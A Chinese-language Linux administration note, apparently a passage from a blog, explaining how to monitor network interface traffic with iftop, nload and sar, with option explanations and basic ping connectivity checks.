    按o切换是否固定只显示当前的连接;
    按f可以编辑过滤代码，这是翻译过来的说法，我还没用过这个！
    按!可以使用shell命令，这个没用过！没搞明白啥命令在这好用呢！
    按q退出监控

使用iftop监控网卡实时流量
    1.监控某网卡
        iftop -i eth0 -n

    2.监控某网卡并同时显示是什么服务.
        iftop -i eth0 -n -P

    3、直接键入iftop

其中，相关参数解释如下：

1.界面上面显示的是类似刻度尺的刻度范围，为显示流量图形的长条作标尺用的。
2.中间的 <=  => 这两个左右箭头，表示的是流量的方向。
3.TX：发送流量
4.RX：接收流量
5.TOTAL：总流量
6.Cum：运行iftop到目前时间的总流量
7.peak：流量峰值
8.rates：分别表示过去 2s 10s 40s 的平均流量

nload用于实时查看网卡流量，默认系统都没有安装，首先安装方式如下：

$ yum install -y epel-release
$ yum install -y nload

使用也非常简单，如下：直接在命令行键入nload

$ nload
Device eth0 [192.168.0.110] (4/5):      # 這裡說明有5張網卡，按enter可切換
=========================================================
Incoming:                       # Incoming：进来的流量
            Curr: 5.21 kBit/s      # Curr：当前的流量值
            Avg: 4.09 kBit/s       # Avg：平均值的流量值
            Min: 1.59 kBit/s       # Min：最小的流量值
            Max: 12.51 kBit/s      # Max：最大的流量值
            Ttl: 4.16 GByte        # Ttl：总的流量值
Outgoing:                        # Outgoing：出去的流量  
            Curr: 16.48 kBit/s     
            Avg: 14.38 kBit/s
            Min: 6.73 kBit/s       
            Max: 28.39 kBit/s


nload 命令一旦执行就会开始监控网络设备，你可以使用下列快捷键操控 nload 应用程序。
1.你可以按键盘上的 ← → 或者 Enter/Tab 键在设备间切换。
2.按 F2 显示选项窗口。

3.按 F5 将当前设置保存到用户配置文件。
4.按 F6 从配置文件重新加载设置。
5.按 q 或者 Ctrl+C 退出 nload

默认每 100 毫秒刷新一次显示数值，下面的例子将时间间隔设置成 500 毫秒：
$ nload -t {interval_number_in_millisec}
$ nload -t 500

$ nload -u h|H|b|B|k|K|m|M|g|G
$ nload -U h|H|b|B|k|K|m|M|g|G
$ nload -u h
$ nload -u G
$ nload -U G

释义：
1、小写选项 -u: h 意为自动格式化为人类易读的单位，b 意为 Bit/s，k 意为 kBit/s，m 意为 MBit/s，g 意为 GBit/s。大写字母意为使用 Byte 替代 Bit。默认为 k。
2、大写选项 -U 与小写选项 -u 非常相似，不同之处在于它展示的是数据量，比如 Bit, kByte, GBit 等等。（没有 "/s"）。默认值是 M

# DEV显示网络接口信息
# 命令后面1 2 意思是：每一秒钟取1次值，取2次
$  sar -n DEV  1 2

另外，-n 参数很有用，他有6个不同的开关：DEV | EDEV | NFS | NFSD | SOCK | ALL ，其代表的含义如下：
DEV显示网络接口信息。EDEV显示关于网络错误的统计数据。NFS统计活动的NFS客户端的信息。NFSD统计NFS服务器的信息 SOCK显示套接字信息 ALL显示所有5个开关

1、看ip     
2、ping 网关  （内网能否接通）
3、ping外网的ip (220.181.112.244)  #（网关到外网是否联通）
4、ping外网域名（www.baidu.com）   #（DNS是否设置成功）

ping 不同可能出现的3种情况
Destination Host Unreachable    主机不可达，目标地址不存在或者主机下线
Network is unreachable  到达目的主机没有可用的路由
Request timeout 数据包相应缓慢或丢失